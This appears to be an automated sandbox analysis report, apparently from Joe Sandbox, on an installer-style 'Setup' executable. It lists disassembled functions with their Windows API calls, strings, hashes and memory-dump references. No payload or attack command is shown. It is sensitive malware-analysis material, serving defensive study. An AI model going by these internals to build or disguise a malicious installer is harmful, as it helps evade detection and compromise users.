Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 199461d8edf86377d08d919b3237cded7d86912c11f4486a8b12345fcf8899bb
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 199461d8edf86377d08d919b3237cded7d86912c11f4486a8b12345fcf8899bb
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 798440c094ce798643cb417ce1f8564fd9d3d890bd0199b89ac5e166078e0d1f
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 798440c094ce798643cb417ce1f8564fd9d3d890bd0199b89ac5e166078e0d1f
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(0001B000,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNEL32(005FD458), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
